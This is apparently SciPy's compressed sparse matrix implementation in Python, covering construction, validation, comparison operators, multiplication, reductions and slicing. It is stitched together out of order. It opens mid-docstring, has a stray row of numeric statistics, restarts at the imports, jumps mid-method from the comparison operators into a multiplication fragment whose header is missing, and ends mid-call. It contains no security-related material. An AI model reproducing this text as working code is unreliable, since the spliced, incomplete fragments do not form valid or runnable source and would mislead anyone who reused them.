i, j and x must be non-empty, 1d arrays.
Inserts each major group (e.g. all entries per row) at a time.
Maintains has_sorted_indices property.
Modifies i, j, x in place.
"""
order = np.argsort(i, kind='mergesort') # stable for duplicates
i = i.take(order, mode='clip')
j = j.take(order, mode='clip')
x = x.take(order, mode='clip')
do_sort = self.has_sorted_indices
# Update index data type
idx_dtype = get_index_dtype((self.indices, self.indptr),
maxval=(self.indptr[-1] + x.size))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
i = np.asarray(i, dtype=idx_dtype)
j = np.asarray(j, dtype=idx_dtype)
# Collate old and new in chunks by major index
indices_parts = []
data_parts = []
ui, ui_indptr = np.unique(i, return_index=True)
ui_indptr = np.append(ui_indptr, len(j))
new_nnzs = np.diff(ui_indptr)
prev = 0
for c, (ii, js, je) in enumerate(zip(ui, ui_indptr, ui_indptr[1:])):
# old entries
start = self.indptr[prev]
stop = self.indptr[ii]
indices_parts.append(self.indices[start:stop])
data_parts.append(self.data[start:stop])
# handle duplicate j: keep last setting
uj, uj_indptr = np.unique(j[js:je][::-1], return_index=True)
if len(uj) == je - js:
indices_parts.append(j[js:je])
data_parts.append(x[js:je])
else:
indices_parts.append(j[js:je][::-1][uj_indptr])
data_parts.append(x[js:je][::-1][uj_indptr])
new_nnzs[c] = len(uj)
prev = ii
# remaining old entries
start = self.indptr[ii]
indices_parts.append(self.indices[start:])
data_parts.append(self.data[start:])
# update attributes
self.indices = np.concatenate(indices_parts)
self.data = np.concatenate(data_parts)
nnzs = np.empty(self.indptr.shape, dtype=idx_dtype)
nnzs[0] = idx_dtype(0)
indptr_diff = np.diff(self.indptr)
indptr_diff[ui] += new_nnzs
nnzs[1:] = indptr_diff
self.indptr = np.cumsum(nnzs, out=nnzs)
if do_sort:
# TODO: only sort where necessary
self.has_sorted_indices = False
self.sort_indices()
self.check_format(full_check=False)
######################
# Conversion methods #
######################
def tocoo(self, copy=True):
major_dim, minor_dim = self._swap(self.shape)
minor_indices = self.indices
major_indices = np.empty(len(minor_indices), dtype=self.indices.dtype)
_sparsetools.expandptr(major_dim, self.indptr, major_indices)
row, col = self._swap((major_indices, minor_indices))
from .coo import coo_matrix
return coo_matrix((self.data, (row, col)), self.shape, copy=copy,
dtype=self.dtype)
tocoo.__doc__ = spmatrix.tocoo.__doc__
def toarray(self, order=None, out=None):
if out is None and order is None:
order = self._swap('cf')[0]
out = self._process_toarray_args(order, out)
if not (out.flags.c_contiguous or out.flags.f_contiguous):
raise ValueError('Output array must be C or F contiguous')
# align ideal order with output array order
if out.flags.c_contiguous:
x = self.tocsr()
y = out
else:
x = self.tocsc()
y = out.T
M, N = x._swap(x.shape)
csr_todense(M, N, x.indptr, x.indices, x.data, y)
return out
toarray.__doc__ = spmatrix.toarray.__doc__
##############################################################
# methods that examine or modify the internal data structure #
##############################################################
def eliminate_zeros(self):
"""Remove zero entries from the matrix
This is an *in place* operation
"""
M, N = self._swap(self.shape)
_sparsetools.csr_eliminate_zeros(M, N, self.indptr, self.indices,
self.data)
self.prune() # nnz may have changed
def __get_has_canonical_format(self):
"""Determine whether the matrix has sorted indices and no duplicates
Returns
- True: if the above applies
- False: otherwise
has_canonical_format implies has_sorted_indices, so if the latter flag
is False, so will the former be; if the former is found True, the
latter flag is also set.
"""
# first check to see if result was cached
if not getattr(self, '_has_sorted_indices', True):
# not sorted => not canonical
self._has_canonical_format = False
elif not hasattr(self, '_has_canonical_format'):
self.has_canonical_format = _sparsetools.csr_has_canonical_format(
len(self.indptr) - 1, self.indptr, self.indices)
return self._has_canonical_format
def __set_has_canonical_format(self, val):
self._has_canonical_format = bool(val)
if val:
self.has_sorted_indices = True
has_canonical_format = property(fget=__get_has_canonical_format,
fset=__set_has_canonical_format)
def sum_duplicates(self):
"""Eliminate duplicate matrix entries by adding them together
The is an *in place* operation
"""
if self.has_canonical_format:
return
self.sort_indices()
M, N = self._swap(self.shape)
_sparsetools.csr_sum_duplicates(M, N, self.indptr, self.indices,
self.data)
self.prune() # nnz may have changed
self.has_canonical_format = True
def __get_sorted(self):
"""Determine whether the matrix has sorted indices
Returns
- True: if the indices of the matrix are in sorted order
- False: otherwise
"""
# first check to see if result was cached
if not hasattr(self, '_has_sorted_indices'):
self._has_sorted_indices = _sparsetools.csr_has_sorted_indices(
len(self.indptr) - 1, self.indptr, self.indices)
return self._has_sorted_indices
def __set_sorted(self, val):
self._has_sorted_indices = bool(val)
has_sorted_indices = property(fget=__get_sorted, fset=__set_sorted)
def sorted_indices(self):
"""Return a copy of this matrix with sorted indices
"""
A = self.copy()
A.sort_indices()
return A
# an alternative that has linear complexity is the following
# although the previous option is typically faster
# return self.toother().toother()
def sort_indices(self):
"""Sort the indices of this matrix *in place*
"""
if not self.has_sorted_indices:
_sparsetools.csr_sort_indices(len(self.indptr) - 1, self.indptr,
self.indices, self.data)
self.has_sorted_indices = True
def prune(self):
"""Remove empty space after all non-zero elements.
"""
major_dim = self._swap(self.shape)[0]
if len(self.indptr) != major_dim + 1:
raise ValueError('index pointer has invalid length')
if len(self.indices) < self.nnz:
raise ValueError('indices array has fewer than nnz elements')
if len(self.data) < self.nnz:
raise ValueError('data array has fewer than nnz elements')
self.indices = _prune_array(self.indices[:self.nnz])
self.data = _prune_array(self.data[:self.nnz])
def resize(self, *shape):
shape = check_shape(shape)
if hasattr(self, 'blocksize'):
bm, bn = self.blocksize
new_M, rm = divmod(shape[0], bm)
new_N, rn = divmod(shape[1], bn)
if rm or rn:
raise ValueError("shape must be divisible into %s blocks. "
"Got %s" % (self.blocksize, shape))
M, N = self.shape[0] // bm, self.shape[1] // bn
else:
new_M, new_N = self._swap(shape)
M, N = self._swap(self.shape)
if new_M < M:
self.indices = self.indices[:self.indptr[new_M]]
self.data = self.data[:self.indptr[new_M]]
self.indptr = self.indptr[:new_M + 1]
elif new_M > M:
self.indptr = np.resize(self.indptr, new_M + 1)
self.indptr[M + 1:].fill(self.indptr[M])
if new_N < N:
mask = self.indices < new_N
if not np.all(mask):
self.indices = self.indices[mask]
self.data = self.data[mask]
major_index, val = self._minor_reduce(np.add, mask)
self.indptr.fill(0)
self.indptr[1:][major_index] = val
np.cumsum(self.indptr, out=self.indptr)
self._shape = shape
resize.__doc__ = spmatrix.resize.__doc__
###################
# utility methods #
###################
# needed by _data_matrix
def _with_data(self, data, copy=True):
"""Returns a matrix with the same sparsity structure as self,
but with different data. By default the structure arrays
(i.e. .indptr and .indices) are copied.
"""
if copy:
return self.__class__((data, self.indices.copy(),
self.indptr.copy()),
shape=self.shape,
dtype=data.dtype)
else:
return self.__class__((data, self.indices, self.indptr),
shape=self.shape, dtype=data.dtype)
def _binopt(self, other, op):
"""apply the binary operation fn to two sparse matrices."""
other = self.__class__(other)
# e.g. csr_plus_csr, csr_minus_csr, etc.
fn = getattr(_sparsetools, self.format + op + self.format)
maxnnz = self.nnz + other.nnz
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=maxnnz)
indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
indices = np.empty(maxnnz, dtype=idx_dtype)
bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
if op in bool_ops:
data = np.empty(maxnnz, dtype=np.bool_)
else:
data = np.empty(maxnnz, dtype=upcast(self.dtype, other.dtype))
fn(self.shape[0], self.shape[1],
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
A = self.__class__((data, indices, indptr), shape=self.shape)
A.prune()
return A
def _divide_sparse(self, other):
"""
Divide this matrix by a second sparse matrix.
"""
if other.shape != self.shape:
raise ValueError('inconsistent shapes')
r = self._binopt(other, '_eldiv_')
if np.issubdtype(r.dtype, np.inexact):
# Eldiv leaves entries outside the combined sparsity
# pattern empty, so they must be filled manually.
# Everything outside of other's sparsity is NaN, and everything
# inside it is either zero or defined by eldiv.
out = np.empty(self.shape, dtype=self.dtype)
out.fill(np.nan)
row, col = other.nonzero()
out[row, col] = 0
r = r.tocoo()
out[r.row, r.col] = r.data
out = matrix(out)
else:
# integers types go with nan <-> 0
out = r
return out
def _process_slice(sl, num):
if sl is None:
i0, i1 = 0, num
elif isinstance(sl, slice):
i0, i1, stride = sl.indices(num)
if stride != 1:
raise ValueError('slicing with step != 1 not supported')
i0 = min(i0, i1) # give an empty slice when i0 > i1
elif isintlike(sl):
if sl < 0:
sl += num
i0, i1 = sl, sl + 1
if i0 < 0 or i1 > num:
raise IndexError('index out of bounds: 0 <= %d < %d <= %d' %
(i0, i1, num))
else:
raise TypeError('expected slice or scalar')
return i0, i1
| 39.039443 | 79 | 0.54398 | from __future__ import division, print_function, absolute_import
__all__ = []
from warnings import warn
import operator
import numpy as np
from scipy._lib._util import _prune_array
from .base import spmatrix, isspmatrix, SparseEfficiencyWarning
from .data import _data_matrix, _minmax_mixin
from .dia import dia_matrix
from . import _sparsetools
from ._sparsetools import (get_csr_submatrix, csr_sample_offsets, csr_todense,
csr_sample_values, csr_row_index, csr_row_slice,
csr_column_index1, csr_column_index2)
from ._index import IndexMixin
from .sputils import (upcast, upcast_char, to_native, isdense, isshape,
getdtype, isscalarlike, isintlike, get_index_dtype,
downcast_intp_index, get_sum_dtype, check_shape,
matrix, asmatrix, is_pydata_spmatrix)
class _cs_matrix(_data_matrix, _minmax_mixin, IndexMixin):
def __init__(self, arg1, shape=None, dtype=None, copy=False):
_data_matrix.__init__(self)
if isspmatrix(arg1):
if arg1.format == self.format and copy:
arg1 = arg1.copy()
else:
arg1 = arg1.asformat(self.format)
self._set_self(arg1)
elif isinstance(arg1, tuple):
if isshape(arg1):
# create empty matrix
self._shape = check_shape(arg1)
M, N = self.shape
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
idx_dtype = get_index_dtype(maxval=max(M, N))
self.data = np.zeros(0, getdtype(dtype, default=float))
self.indices = np.zeros(0, idx_dtype)
self.indptr = np.zeros(self._swap((M, N))[0] + 1,
dtype=idx_dtype)
else:
if len(arg1) == 2:
# (data, ij) format
from .coo import coo_matrix
other = self.__class__(coo_matrix(arg1, shape=shape))
self._set_self(other)
elif len(arg1) == 3:
# (data, indices, indptr) format
(data, indices, indptr) = arg1
# Select index dtype large enough to pass array and
# scalar parameters to sparsetools
maxval = None
if shape is not None:
maxval = max(shape)
idx_dtype = get_index_dtype((indices, indptr),
maxval=maxval,
check_contents=True)
self.indices = np.array(indices, copy=copy,
dtype=idx_dtype)
self.indptr = np.array(indptr, copy=copy, dtype=idx_dtype)
self.data = np.array(data, copy=copy, dtype=dtype)
else:
raise ValueError("unrecognized {}_matrix "
"constructor usage".format(self.format))
else:
# must be dense
try:
arg1 = np.asarray(arg1)
except Exception:
raise ValueError("unrecognized {}_matrix constructor usage"
"".format(self.format))
from .coo import coo_matrix
self._set_self(self.__class__(coo_matrix(arg1, dtype=dtype)))
# Read matrix dimensions given, if any
if shape is not None:
self._shape = check_shape(shape)
else:
if self.shape is None:
# shape not already set, try to infer dimensions
try:
major_dim = len(self.indptr) - 1
minor_dim = self.indices.max() + 1
except Exception:
raise ValueError('unable to infer matrix dimensions')
else:
self._shape = check_shape(self._swap((major_dim,
minor_dim)))
if dtype is not None:
self.data = self.data.astype(dtype, copy=False)
self.check_format(full_check=False)
def getnnz(self, axis=None):
if axis is None:
return int(self.indptr[-1])
else:
if axis < 0:
axis += 2
axis, _ = self._swap((axis, 1 - axis))
_, N = self._swap(self.shape)
if axis == 0:
return np.bincount(downcast_intp_index(self.indices),
minlength=N)
elif axis == 1:
return np.diff(self.indptr)
raise ValueError('axis out of bounds')
getnnz.__doc__ = spmatrix.getnnz.__doc__
def _set_self(self, other, copy=False):
if copy:
other = other.copy()
self.data = other.data
self.indices = other.indices
self.indptr = other.indptr
self._shape = check_shape(other.shape)
def check_format(self, full_check=True):
# use _swap to determine proper bounds
major_name, minor_name = self._swap(('row', 'column'))
major_dim, minor_dim = self._swap(self.shape)
# index arrays should have integer data types
if self.indptr.dtype.kind != 'i':
warn("indptr array has non-integer dtype ({})"
"".format(self.indptr.dtype.name), stacklevel=3)
if self.indices.dtype.kind != 'i':
warn("indices array has non-integer dtype ({})"
"".format(self.indices.dtype.name), stacklevel=3)
idx_dtype = get_index_dtype((self.indptr, self.indices))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
self.data = to_native(self.data)
# check array shapes
for x in [self.data.ndim, self.indices.ndim, self.indptr.ndim]:
if x != 1:
raise ValueError('data, indices, and indptr should be 1-D')
# check index pointer
if (len(self.indptr) != major_dim + 1):
raise ValueError("index pointer size ({}) should be ({})"
"".format(len(self.indptr), major_dim + 1))
if (self.indptr[0] != 0):
raise ValueError("index pointer should start with 0")
# check index and data arrays
if (len(self.indices) != len(self.data)):
raise ValueError("indices and data should have the same size")
if (self.indptr[-1] > len(self.indices)):
raise ValueError("Last value of index pointer should be less than "
"the size of index and data arrays")
self.prune()
if full_check:
# check format validity (more expensive)
if self.nnz > 0:
if self.indices.max() >= minor_dim:
raise ValueError("{} index values must be < {}"
"".format(minor_name, minor_dim))
if self.indices.min() < 0:
raise ValueError("{} index values must be >= 0"
"".format(minor_name))
if np.diff(self.indptr).min() < 0:
raise ValueError("index pointer values must form a "
"non-decreasing sequence")
# if not self.has_sorted_indices():
# warn('Indices were not in sorted order. Sorting indices.')
# self.sort_indices()
# assert(self.has_sorted_indices())
# TODO check for duplicates?
#######################
# Boolean comparisons #
#######################
def _scalar_binopt(self, other, op):
self.sum_duplicates()
res = self._with_data(op(self.data, other), copy=True)
res.eliminate_zeros()
return res
def __eq__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
return self.__class__(self.shape, dtype=np.bool_)
if other == 0:
warn("Comparing a sparse matrix with 0 using == is inefficient"
", try using != instead.", SparseEfficiencyWarning,
stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
inv = self._scalar_binopt(other, operator.ne)
return all_true - inv
else:
return self._scalar_binopt(other, operator.eq)
# Dense other.
elif isdense(other):
return self.todense() == other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
warn("Comparing sparse matrices using == is inefficient, try using"
" != instead.", SparseEfficiencyWarning, stacklevel=3)
# TODO sparse broadcasting
if self.shape != other.shape:
return False
elif self.format != other.format:
other = other.asformat(self.format)
res = self._binopt(other, '_ne_')
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true - res
else:
return False
def __ne__(self, other):
# Scalar other.
if isscalarlike(other):
if np.isnan(other):
warn("Comparing a sparse matrix with nan using != is"
" inefficient", SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
return all_true
elif other != 0:
warn("Comparing a sparse matrix with a nonzero scalar using !="
" is inefficient, try using == instead.",
SparseEfficiencyWarning, stacklevel=3)
all_true = self.__class__(np.ones(self.shape), dtype=np.bool_)
inv = self._scalar_binopt(other, operator.eq)
return all_true - inv
else:
return self._scalar_binopt(other, operator.ne)
# Dense other.
elif isdense(other):
return self.todense() != other
# Pydata sparse other.
elif is_pydata_spmatrix(other):
return NotImplemented
# Sparse other.
elif isspmatrix(other):
# TODO sparse broadcasting
if self.shape != other.shape:
return True
elif self.format != other.format:
other = other.asformat(self.format)
return self._binopt(other, '_ne_')
else:
return True
def _inequality(self, other, op, op_name, bad_scalar_msg):
# Scalar other.
if isscalarlike(other):
if 0 == other and op_name in ('_le_', '_ge_'):
raise NotImplementedError(" >= and <= don't work with 0.")
elif op(0, other):
warn(bad_scalar_msg, SparseEfficiencyWarning)
other_arr = np.empty(self.shape, dtype=np.result_type(other))
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
return self._scalar_binopt(other, op)
elif isdense(other):
return op(self.todense(), other)
elif isspmatrix(other):
if self.shape != other.shape:
raise ValueError("inconsistent shapes")
elif self.format != other.format:
other = other.asformat(self.format)
if op_name not in ('_ge_', '_le_'):
return self._binopt(other, op_name)
warn("Comparing sparse matrices using >= and <= is inefficient, "
"using <, >, or !=, instead.", SparseEfficiencyWarning)
all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
res = self._binopt(other, '_gt_' if op_name == '_le_' else '_lt_')
return all_true - res
else:
raise ValueError("Operands could not be compared.")
def __lt__(self, other):
return self._inequality(other, operator.lt, '_lt_',
"Comparing a sparse matrix with a scalar "
"greater than zero using < is inefficient, "
"try using >= instead.")
def __gt__(self, other):
return self._inequality(other, operator.gt, '_gt_',
"Comparing a sparse matrix with a scalar "
"less than zero using > is inefficient, "
"try using <= instead.")
def __le__(self, other):
return self._inequality(other, operator.le, '_le_',
"Comparing a sparse matrix with a scalar "
"greater than zero using <= is inefficient, "
"try using > instead.")
def __ge__(self, other):
return self._inequality(other, operator.ge, '_ge_',
"Comparing a sparse matrix with a scalar "
"less than zero using >= is inefficient, "
"try using < instead.")
_scalar(other.toarray()[0, 0])
elif self.shape == (1, 1):
return other._mul_scalar(self.toarray()[0, 0])
elif self.shape[1] == 1 and other.shape[0] == 1:
return self._mul_sparse_matrix(other.tocsc())
elif self.shape[0] == 1 and other.shape[1] == 1:
return other._mul_sparse_matrix(self.tocsc())
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[1], other.shape[1]))
return self._mul_sparse_matrix(other)
elif self.shape[0] == 1 and self.shape[1] == other.shape[1]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[1], self.shape[1]))
return other._mul_sparse_matrix(copy)
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[0], other.shape[0]))
return other._mul_sparse_matrix(self)
elif self.shape[1] == 1 and self.shape[0] == other.shape[0]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[0], self.shape[0]))
return copy._mul_sparse_matrix(other)
else:
raise ValueError("inconsistent shapes")
other = np.atleast_2d(other)
if other.ndim != 2:
return np.multiply(self.toarray(), other)
# Single element / wrapped object.
if other.size == 1:
return self._mul_scalar(other.flat[0])
# Fast case for trivial sparse matrix.
elif self.shape == (1, 1):
return np.multiply(self.toarray()[0, 0], other)
from .coo import coo_matrix
ret = self.tocoo()
# Matching shapes.
if self.shape == other.shape:
data = np.multiply(ret.data, other[ret.row, ret.col])
# Sparse row vector times...
elif self.shape[0] == 1:
if other.shape[1] == 1: # Dense column vector.
data = np.multiply(ret.data, other)
elif other.shape[1] == self.shape[1]: # Dense matrix.
data = np.multiply(ret.data, other[:, ret.col])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(np.arange(other.shape[0]), len(ret.row))
col = np.tile(ret.col, other.shape[0])
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(other.shape[0], self.shape[1]),
copy=False)
# Sparse column vector times...
elif self.shape[1] == 1:
if other.shape[0] == 1: # Dense row vector.
data = np.multiply(ret.data[:, None], other)
elif other.shape[0] == self.shape[0]: # Dense matrix.
data = np.multiply(ret.data[:, None], other[ret.row])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(ret.row, other.shape[1])
col = np.tile(np.arange(other.shape[1]), len(ret.col))
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(self.shape[0], other.shape[1]),
copy=False)
# Sparse matrix times dense row vector.
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
data = np.multiply(ret.data, other[:, ret.col].ravel())
# Sparse matrix times dense column vector.
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
data = np.multiply(ret.data, other[ret.row].ravel())
else:
raise ValueError("inconsistent shapes")
ret.data = data.view(np.ndarray).ravel()
return ret
###########################
# Multiplication handlers #
###########################
def _mul_vector(self, other):
M, N = self.shape
# output array
result = np.zeros(M, dtype=upcast_char(self.dtype.char,
other.dtype.char))
# csr_matvec or csc_matvec
fn = getattr(_sparsetools, self.format + '_matvec')
fn(M, N, self.indptr, self.indices, self.data, other, result)
return result
def _mul_multivector(self, other):
M, N = self.shape
n_vecs = other.shape[1] # number of column vectors
result = np.zeros((M, n_vecs),
dtype=upcast_char(self.dtype.char, other.dtype.char))
# csr_matvecs or csc_matvecs
fn = getattr(_sparsetools, self.format + '_matvecs')
fn(M, N, n_vecs, self.indptr, self.indices, self.data,
other.ravel(), result.ravel())
return result
def _mul_sparse_matrix(self, other):
M, K1 = self.shape
K2, N = other.shape
major_axis = self._swap((M, N))[0]
other = self.__class__(other) # convert to this format
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices))
fn = getattr(_sparsetools, self.format + '_matmat_maxnnz')
nnz = fn(M, N,
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype))
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=nnz)
indptr = np.empty(major_axis + 1, dtype=idx_dtype)
indices = np.empty(nnz, dtype=idx_dtype)
data = np.empty(nnz, dtype=upcast(self.dtype, other.dtype))
fn = getattr(_sparsetools, self.format + '_matmat')
fn(M, N, np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
return self.__class__((data, indices, indptr), shape=(M, N))
def diagonal(self, k=0):
rows, cols = self.shape
if k <= -rows or k >= cols:
raise ValueError("k exceeds matrix dimensions")
fn = getattr(_sparsetools, self.format + "_diagonal")
y = np.empty(min(rows + min(k, 0), cols - max(k, 0)),
dtype=upcast(self.dtype))
fn(k, self.shape[0], self.shape[1], self.indptr, self.indices,
self.data, y)
return y
diagonal.__doc__ = spmatrix.diagonal.__doc__
#####################
# Other binary ops #
#####################
def _maximum_minimum(self, other, npop, op_name, dense_check):
if isscalarlike(other):
if dense_check(other):
warn("Taking maximum (minimum) with > 0 (< 0) number results"
" to a dense matrix.", SparseEfficiencyWarning,
stacklevel=3)
other_arr = np.empty(self.shape, dtype=np.asarray(other).dtype)
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
self.sum_duplicates()
new_data = npop(self.data, np.asarray(other))
mat = self.__class__((new_data, self.indices, self.indptr),
dtype=new_data.dtype, shape=self.shape)
return mat
elif isdense(other):
return npop(self.todense(), other)
elif isspmatrix(other):
return self._binopt(other, op_name)
else:
raise ValueError("Operands not compatible.")
def maximum(self, other):
return self._maximum_minimum(other, np.maximum,
'_maximum_', lambda x: np.asarray(x) > 0)
maximum.__doc__ = spmatrix.maximum.__doc__
def minimum(self, other):
return self._maximum_minimum(other, np.minimum,
'_minimum_', lambda x: np.asarray(x) < 0)
minimum.__doc__ = spmatrix.minimum.__doc__
#####################
# Reduce operations #
#####################
def sum(self, axis=None, dtype=None, out=None):
# The spmatrix base class already does axis=0 and axis=1 efficiently
# so we only do the case axis=None here
if (not hasattr(self, 'blocksize') and
axis in self._swap(((1, -1), (0, 2)))[0]):
# faster than multiplication for large minor axis in CSC/CSR
res_dtype = get_sum_dtype(self.dtype)
ret = np.zeros(len(self.indptr) - 1, dtype=res_dtype)
major_index, value = self._minor_reduce(np.add)
ret[major_index] = value
ret = asmatrix(ret)
if axis % 2 == 1:
ret = ret.T
if out is not None and out.shape != ret.shape:
raise ValueError('dimensions do not match')
return ret.sum(axis=(), dtype=dtype, out=out)
# spmatrix will handle the remaining situations when axis
# is in {None, -1, 0, 1}
else:
return spmatrix.sum(self, axis=axis, dtype=dtype, out=out)
sum.__doc__ = spmatrix.sum.__doc__
def _minor_reduce(self, ufunc, data=None):
    """Reduce stored values with ufunc over the minor axis.

    NOTE(review): operates on stored entries only and does not call
    sum_duplicates() first — callers must canonicalize if needed.

    Returns
    -------
    major_index : positions along the major axis with >= 1 stored entry
    value : the reduction of each such row's/column's stored values
    """
    if data is None:
        data = self.data
    # Rows/columns whose indptr span is non-empty.
    major_index = np.flatnonzero(np.diff(self.indptr))
    value = ufunc.reduceat(data,
                           downcast_intp_index(self.indptr[major_index]))
    return major_index, value
#######################
# Getting and Setting #
#######################
def _get_intXint(self, row, col):
    # Scalar indexing: extract the 1x1 submatrix and sum its stored
    # entries (0 or more — duplicates, if present, are summed).
    M, N = self._swap(self.shape)
    major, minor = self._swap((row, col))
    indptr, indices, data = get_csr_submatrix(
        M, N, self.indptr, self.indices, self.data,
        major, major + 1, minor, minor + 1)
    return data.sum(dtype=self.dtype)
def _get_sliceXslice(self, row, col):
    major, minor = self._swap((row, col))
    if major.step in (1, None) and minor.step in (1, None):
        # Both slices contiguous: one direct submatrix extraction.
        return self._get_submatrix(major, minor, copy=True)
    # Strided slice on either axis: slice each axis separately.
    return self._major_slice(major)._minor_slice(minor)
def _get_arrayXarray(self, row, col):
    # inner indexing: sample the value at each paired (row, col) position
    idx_dtype = self.indices.dtype
    M, N = self._swap(self.shape)
    major, minor = self._swap((row, col))
    major = np.asarray(major, dtype=idx_dtype)
    minor = np.asarray(minor, dtype=idx_dtype)

    val = np.empty(major.size, dtype=self.dtype)
    csr_sample_values(M, N, self.indptr, self.indices, self.data,
                      major.size, major.ravel(), minor.ravel(), val)
    # 1-D index arrays yield a (dense) matrix of values; higher-rank
    # index arrays yield a sparse matrix with the broadcast shape.
    if major.ndim == 1:
        return asmatrix(val)
    return self.__class__(val.reshape(major.shape))
def _get_columnXarray(self, row, col):
    # outer indexing: select rows, then columns, via fancy indexing
    major, minor = self._swap((row, col))
    return self._major_index_fancy(major)._minor_index_fancy(minor)
def _major_index_fancy(self, idx):
    """Index along the major axis where idx is an array of ints."""
    idx_dtype = self.indices.dtype
    indices = np.asarray(idx, dtype=idx_dtype).ravel()

    _, N = self._swap(self.shape)
    M = len(indices)
    new_shape = self._swap((M, N))
    if M == 0:
        # Empty selection -> all-zero matrix of the right shape.
        return self.__class__(new_shape)

    # New indptr: cumulative nnz counts of the selected rows/columns.
    row_nnz = np.diff(self.indptr)
    idx_dtype = self.indices.dtype
    res_indptr = np.zeros(M+1, dtype=idx_dtype)
    np.cumsum(row_nnz[idx], out=res_indptr[1:])

    nnz = res_indptr[-1]
    res_indices = np.empty(nnz, dtype=idx_dtype)
    res_data = np.empty(nnz, dtype=self.dtype)
    csr_row_index(M, indices, self.indptr, self.indices, self.data,
                  res_indices, res_data)

    return self.__class__((res_data, res_indices, res_indptr),
                          shape=new_shape, copy=False)
def _major_slice(self, idx, copy=False):
    """Index along the major axis where idx is a slice object."""
    if idx == slice(None):
        # Full slice: nothing to extract.
        return self.copy() if copy else self

    M, N = self._swap(self.shape)
    start, stop, step = idx.indices(M)
    M = len(range(start, stop, step))
    new_shape = self._swap((M, N))
    if M == 0:
        return self.__class__(new_shape)

    # New indptr from per-row/column nonzero counts of the slice.
    row_nnz = np.diff(self.indptr)
    idx_dtype = self.indices.dtype
    res_indptr = np.zeros(M+1, dtype=idx_dtype)
    np.cumsum(row_nnz[idx], out=res_indptr[1:])

    if step == 1:
        # Contiguous slice: indices/data form one contiguous range.
        all_idx = slice(self.indptr[start], self.indptr[stop])
        res_indices = np.array(self.indices[all_idx], copy=copy)
        res_data = np.array(self.data[all_idx], copy=copy)
    else:
        nnz = res_indptr[-1]
        res_indices = np.empty(nnz, dtype=idx_dtype)
        res_data = np.empty(nnz, dtype=self.dtype)
        csr_row_slice(start, stop, step, self.indptr, self.indices,
                      self.data, res_indices, res_data)

    return self.__class__((res_data, res_indices, res_indptr),
                          shape=new_shape, copy=False)
def _minor_index_fancy(self, idx):
    """Index along the minor axis where idx is an array of ints."""
    idx_dtype = self.indices.dtype
    idx = np.asarray(idx, dtype=idx_dtype).ravel()

    M, N = self._swap(self.shape)
    k = len(idx)
    new_shape = self._swap((M, k))
    if k == 0:
        return self.__class__(new_shape)

    # pass 1: count idx entries and compute new indptr
    col_offsets = np.zeros(N, dtype=idx_dtype)
    res_indptr = np.empty_like(self.indptr)
    csr_column_index1(k, idx, M, N, self.indptr, self.indices,
                      col_offsets, res_indptr)

    # pass 2: copy indices/data for selected idxs
    col_order = np.argsort(idx).astype(idx_dtype, copy=False)
    nnz = res_indptr[-1]
    res_indices = np.empty(nnz, dtype=idx_dtype)
    res_data = np.empty(nnz, dtype=self.dtype)
    csr_column_index2(col_order, col_offsets, len(self.indices),
                      self.indices, self.data, res_indices, res_data)
    return self.__class__((res_data, res_indices, res_indptr),
                          shape=new_shape, copy=False)
def _minor_slice(self, idx, copy=False):
    """Index along the minor axis where idx is a slice object."""
    if idx == slice(None):
        return self.copy() if copy else self

    M, N = self._swap(self.shape)
    start, stop, step = idx.indices(N)
    N = len(range(start, stop, step))
    if N == 0:
        return self.__class__(self._swap((M, N)))
    if step == 1:
        # Contiguous minor slice: direct submatrix extraction.
        return self._get_submatrix(minor=idx, copy=copy)
    # TODO: don't fall back to fancy indexing here
    return self._minor_index_fancy(np.arange(start, stop, step))
def _get_submatrix(self, major=None, minor=None, copy=False):
    """Return a submatrix of this matrix.

    major, minor : None, an int, or a step-1 slice (see _process_slice).
    """
    M, N = self._swap(self.shape)
    i0, i1 = _process_slice(major, M)
    j0, j1 = _process_slice(minor, N)

    if i0 == 0 and j0 == 0 and i1 == M and j1 == N:
        # Whole matrix selected: avoid the extraction entirely.
        return self.copy() if copy else self

    indptr, indices, data = get_csr_submatrix(
